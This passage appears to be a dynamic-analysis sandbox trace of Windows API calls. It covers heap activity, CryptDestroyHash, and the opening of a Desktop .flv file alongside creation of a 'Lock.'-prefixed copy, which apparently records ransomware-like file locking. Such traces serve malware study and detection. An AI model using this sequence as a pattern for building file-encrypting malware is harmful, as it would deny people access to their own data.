(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0190.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466dd0 [0190.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.413] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0190.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.414] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.418] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0190.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/yvFiHqzM6fmTt.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yvfihqzm6fmtt.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.421] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.421] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0190.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0190.422] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.422] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.422] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0190.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.yvFiHqzM6fmTt.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.yvfihqzm6fmtt.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.423] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0190.423] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.423] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.423] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.423] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0190.423] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xbeb2, lpOverlapped=0x0) returned 1 [0190.424] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0190.426] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0190.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xbeb2) returned 0x24d7a58 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0190.427] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0190.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.427] HeapFree (in: 